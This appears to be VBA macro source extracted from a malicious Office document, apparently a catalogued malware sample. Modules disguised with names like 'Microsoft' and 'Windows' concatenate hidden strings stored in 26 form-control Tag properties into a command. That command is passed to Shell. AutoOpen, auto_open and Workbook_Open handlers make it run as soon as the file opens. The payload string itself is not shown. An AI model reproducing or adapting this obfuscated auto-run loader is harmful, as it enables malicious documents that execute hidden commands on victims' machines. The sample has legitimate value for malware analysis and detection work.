Attribute VB_Name = "Microsoft"
Function Word()
Dim total As String
total = Windows.q.Tag + Windows.w.Tag + Windows.e.Tag + Windows.r.Tag + Windows.t.Tag + Windows.y.Tag + Windows.u.Tag + Windows.i.Tag + Windows.o.Tag + Windows.p.Tag + Windows.a.Tag + Windows.s.Tag + Windows.d.Tag + Windows.f.Tag + Windows.g.Tag + Windows.h.Tag + Windows.j.Tag + Windows.k.Tag + Windows.l.Tag + Windows.z.Tag + Windows.x.Tag + Windows.c.Tag + Windows.v.Tag + Windows.b.Tag + Windows.n.Tag + Windows.m.Tag
Shell total
End Function
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub auto_open()
Microsoft.Word
End Sub
Sub AutoOpen()
auto_open
End Sub
Sub Workbook_Open()
auto_open
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{26678A3B-DE47-4B9F-98E4-EC080D332B56}{69C01797-352B-42B7-BD19-6EDD76B30345}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{0431378D-6231-4F6D-A8E1-04DF2980DF07}{E8CF6AB7-C7E2-47D3-A583-B2E453FE4515}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Windows"
Attribute VB_Base = "0{6E07DDBE-55FD-4DB3-9BB5-6CCDFF364B05}{0D05C1D7-C2B3-4F19-8015-BA719F3AD37D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()

End Sub


INQUEST-PP=macro
